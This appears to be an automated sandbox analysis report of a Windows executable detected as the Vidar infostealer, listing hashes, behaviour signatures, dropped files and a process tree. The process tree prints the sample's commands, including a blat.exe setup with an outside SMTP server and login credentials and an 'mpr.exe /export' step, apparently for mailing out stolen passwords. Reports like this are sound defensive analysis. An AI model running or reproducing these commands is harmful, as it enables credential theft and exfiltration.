Analysis

  • max time kernel
    148s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240319-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240319-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-04-2024 01:25

General

  • Target

    e6507f00c8155f6ec0a857d75431801f_JaffaCakes118.exe

  • Size

    1.1MB

  • MD5

    e6507f00c8155f6ec0a857d75431801f

  • SHA1

    794e6b36e2667a2e81800750ab2126df99b89544

  • SHA256

    ab46c89d287660a7cefaa2ab6c9a45b6bc9c3e6acdf56738da9f675e56d3987b

  • SHA512

    059de3bf4f9e0451ba44f863950c388126c6df105eadfb87e872ee5fb9e96a5cdf9a8a2c83c57e1db7947f38dc09a0001094e801c61c846c07af7126f2d1acab

  • SSDEEP

    24576:7VvsNq/J8UHrzggc4a0ZkR/u2t1sCSSS1HxyifQcLsHBQz:7V3rzgNRokRm6rdQHxLfQcIi

Score
10/10

Malware Config

Signatures

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 21 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\e6507f00c8155f6ec0a857d75431801f_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\e6507f00c8155f6ec0a857d75431801f_JaffaCakes118.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3968
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7BA8.tmp\1.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:876
      • C:\Windows\SysWOW64\PING.EXE
        ping ya.ru -n 5
        3⤵
        • Runs ping.exe
        PID:756
      • C:\Users\Admin\AppData\Local\Temp\7BA8.tmp\blat.exe
        blat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u donakovi -pw 154632
        3⤵
        • Executes dropped EXE
        PID:3836
      • C:\Users\Admin\AppData\Local\Temp\7BA8.tmp\mpr.exe
        mpr.exe /export
        3⤵
        • Executes dropped EXE
        • Modifies registry class
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        PID:380
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1304 --field-trial-handle=2232,i,3915538061666887171,15629965885515244134,262144 --variations-seed-version /prefetch:8
    1⤵
      PID:1152

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\7BA8.tmp\1.bat

      Filesize

      340B

      MD5

      b484fff9108e34bc60c06be2188ce7f8

      SHA1

      4472a8ea5902d5c770e163d8fb3bc781750c11f0

      SHA256

      f9dcaf616357d5f5db051803eedcbfe99bb1e09573e702becaa104cb2207927b

      SHA512

      5efffd0c08a41eb785250463078cbcb575afebd3333a846671f94034042e376ecb9f5d1f7b24052c69345ee3bd79490cb70e0eb3725df72cdcb855c9b1ff1f14

    • C:\Users\Admin\AppData\Local\Temp\7BA8.tmp\blat.exe

      Filesize

      112KB

      MD5

      31f84e433e8d1865e322998a41e6d90e

      SHA1

      cbea6cda10db869636f57b1cffad39b22e6f7f17

      SHA256

      aeca4a77d617da84296b5f857b2821333fe4b9663e8df74ef5a25a7882693e5e

      SHA512

      7ae504723b5b140e45af3163d1bfdc5ee0497debafba07cfbf1d2c15147c000be53f4ac8d36d926ed11cf0bb62e9e72f9bcf5d4caf92aa732d942f55834e2be9

    • C:\Users\Admin\AppData\Local\Temp\7BA8.tmp\mpr.exe

      Filesize

      3.3MB

      MD5

      8dba37604bf06ebcef07dd1085865a6a

      SHA1

      1202eb0ea461c502daa7da9d7d75fff226bf57bd

      SHA256

      038ab25642a1220c27028d0b559062b43764c66541ec07a96b2a99d25d9638b0

      SHA512

      0f286677e964d733ea3270f0f196769d8ddddb4a6bb3007187eae56e9abb5e22ee984703df5356b5d9049e5ad3b24c567ae13773684113a4440b2cce5d0132fa

    • C:\Users\Admin\AppData\Local\Temp\7BA8.tmp\mpr.ini

      Filesize

      257B

      MD5

      7747daf77047bd41bfe8fe23170c9e70

      SHA1

      916568058d3cd57f4263821c824b72f0aef9b7a6

      SHA256

      b1e4df621dcf3ac9bdcfa4b18ca8f2132e71ac2586bb3df0c52f9993aedd0ee8

      SHA512

      3cd79356260684671a2d51703282bdca3c50b47768c62dd1cf9763f01b74b83cd34380bafd715df0ef05dae06b484041e92f8af99ed50a8eb6361620ea349f5c

    • memory/380-25-0x00000000004F0000-0x00000000004F1000-memory.dmp

      Filesize

      4KB

    • memory/380-28-0x0000000000500000-0x000000000084A000-memory.dmp

      Filesize

      3.3MB

    • memory/380-32-0x00000000004F0000-0x00000000004F1000-memory.dmp

      Filesize

      4KB

    • memory/3968-0-0x0000000000400000-0x0000000000798000-memory.dmp

      Filesize

      3.6MB

    • memory/3968-27-0x0000000000400000-0x0000000000798000-memory.dmp

      Filesize

      3.6MB